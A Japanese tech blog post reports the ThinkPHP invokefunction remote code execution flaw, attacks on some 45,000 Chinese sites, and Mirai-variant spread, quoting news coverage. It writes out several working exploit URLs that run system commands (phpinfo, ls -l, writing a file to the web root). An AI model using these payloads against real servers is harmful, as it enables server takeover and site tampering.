orangeitems’s diary

クラウドで働くエンジニアの日々の感想です(ほぼ毎日更新)。

ThinkPHPという中国のフレームワークの脆弱性が狙われて、中国の45000のサイトが攻撃を受け続けている

f:id:orangeitems:20181223164759j:plain

 

ThinkPHPという中国ローカルのフレームワークに脆弱性

ThinkPHPと聞いても日本の誰も知らないと思いますが、中国ではかなりの人気のあるフレームワークだそうです。このフレームワークに脆弱性が見つかり、中国ではこれに対する攻撃が蔓延しているとZDnet.comが伝えています。

 

www.zdnet.com

ZDNetによると、45,000を超える中国のWebサイトが、Webサーバーへのアクセスを取得しようとしている悪人からの攻撃の攻撃を受けているという。

この攻撃は、ローカルWeb開発シーンで非常に人気のある、中国製のPHPフレームワークであるThinkPHPで構築されたWebサイトを標的としています。

すべての攻撃は、中国のサイバーセキュリティ会社VulnSpyがThinkPHPの概念実証エクスプロイトをExploitDB(無料脆弱性コードのホスティングで人気のあるウェブサイト)に投稿した後に始まりました。

概念実証コードは、フレームワークのinvokeFunctionメソッドの脆弱性を悪用して、基盤となるサーバーで悪質なコードを実行します。Webベースのアプリケーションのほとんどの脆弱性が悪用される傾向があるため、この脆弱性はリモートから悪用される可能性があり、攻撃者がサーバーを制御する可能性があります。

 

なんだかなあ、なその攻撃方法

ExploitDBに脆弱性の攻撃方法が書いてあるのですが、なんだかなあという感想しかありません。

 

www.exploit-db.com

http://server/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=php%20-r%20'phpinfo();'

 

これ、シェルのコマンドをそのまま送り込めちゃうと、そういうことですよね。

 

中国のニュースを見ると、もう攻撃方法まできちんと書いてあって、失笑するしかありません。

 

www.admin5.com

Http://127.0.0.1/anquan/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=ls%20-l

Webサイトに直接送信すると、Webサイトの現在のルートディレクトリにあるすべてのファイルに直接問い合わせることができます。

 

(中略)

 

この脆弱性を利用して、リモートコードインジェクションで直接phpinfoステートメントを実行することもできますphp.iniに保存されている現在のphpのバージョン、パス、拡張子、アドレスを問い合わせる次のコードを見ることができます。

Http://127.0.0.1/anquan/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars [0] = system&vars [1] = php%20-r%20'phpinfo(); '

 

(中略)

 

phpinfo、ディレクトリファイルのクエリ、WebサイトへのシェルのWebサイトへのトロイの木馬ファイルの書き込みを行うことができるので、何人かの質問があるかもしれません。答えは、はい、safe.phpに書かれたトロイの木馬コードの文でテストします。

Http://127.0.0.1/anquan/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=echo%20%27%27%20>%20safe .php

 

何が起こるか

ドキュメントルートの内容を外部から修正できるようになってしまうので、仮想通貨のマイニングスクリプトを埋め込まれたり、サイトの内容を改ざんしたりすることができるようになります。

また、DDoSの際の踏み台にも使われる可能性があります。かの有名なMiraiがThinkPHPのこの脆弱性を利用して広がっているとトレンドマイクロが報じています。

 

blog.trendmicro.com

私たちは、「Miori」と呼ばれるもう1つのMiraiの変種を分析しました。これは、PHPフレームワークのThinkPHPのRemote Code Execution(RCE)の脆弱性を介して拡散しています。エクスプロイトの脆弱性に関連は比較的新しいです-それについての詳細は唯一き浮上し、その到着方法については12月11日に、のIoTボットネットは、それは5.0.23と5.1.31より前のThinkPHPバージョンに影響悪用した使用しています。興味深いことに、私達のSmart Protection NetworkはまたThinkPHP RCEに関連したイベントの最近の増加を示しました。悪意のある行為者がそれぞれの利益のためにThinkPHPの悪用を悪用することを期待しています。

 

日本では全く報じられていないこの件ですが、インターネットを俯瞰で見ると相当に大きな話だと思います。ひどい脆弱性だなあと思いますし、それをさらに利用する攻撃者ももっとひどいなあ・・。